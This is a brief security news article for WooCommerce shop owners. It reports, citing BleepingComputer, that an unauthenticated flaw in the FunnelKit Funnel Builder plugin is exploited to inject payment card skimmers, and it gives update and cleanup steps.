FunnelKit Plugin Vulnerability Steals Payment Data

A serious security vulnerability in the FunnelKit Funnel Builder plugin for WordPress is reportedly being actively exploited by attackers to steal payment card information from customers at checkout. According to BleepingComputer, the flaw affects all versions of the plugin before 3.15.0.3 and can be exploited without any login or authentication.

What is happening?

According to BleepingComputer, attackers are targeting an unprotected checkout endpoint in the plugin. This allows them to change the plugin's global settings without needing a password or account. Once inside, they inject malicious JavaScript code into a setting called "External Scripts," which then runs on every checkout page your customers visit.

The injected code is reportedly disguised as a fake Google Tag Manager or Google Analytics script, making it hard to spot. It opens a hidden connection to an external server and delivers a payment card skimmer, a piece of code designed to silently copy sensitive information as customers type it in. According to BleepingComputer, the stolen data can include credit card numbers, CVVs, billing addresses and other customer information.

The plugin is reportedly active on more than 40,000 websites, according to BleepingComputer.

What has FunnelKit done?

FunnelKit has released version 3.15.0.3 of the Funnel Builder plugin to fix the vulnerability. The company recommends that website owners update to this version immediately through the WordPress dashboard. FunnelKit also advises checking Settings > Checkout > External Scripts to look for any suspicious scripts an attacker may have already added.

It is worth noting that this reporting comes from BleepingComputer, a secondary news source, rather than a direct vendor advisory or official regulatory decision. The vulnerability has not received an official CVE identifier, according to BleepingComputer.

Steps to take now

If you use the FunnelKit Funnel Builder plugin on your WooCommerce store, here is what to do:

• Update immediately to version 3.15.0.3 or later via your WordPress dashboard
• Check your External Scripts setting under Settings > Checkout > External Scripts and remove anything unfamiliar
• Review your site against our security checklist for small businesses
• Read more about keeping WordPress plugins safe

What does this mean for your website?

If you run an online shop using WooCommerce and the FunnelKit Funnel Builder plugin, your customers' payment details could be at risk if you have not yet updated. Updating your plugins promptly is one of the most straightforward ways to protect your customers and your business. Even if you are unsure whether your site is affected, checking the External Scripts setting costs nothing and takes only a few minutes.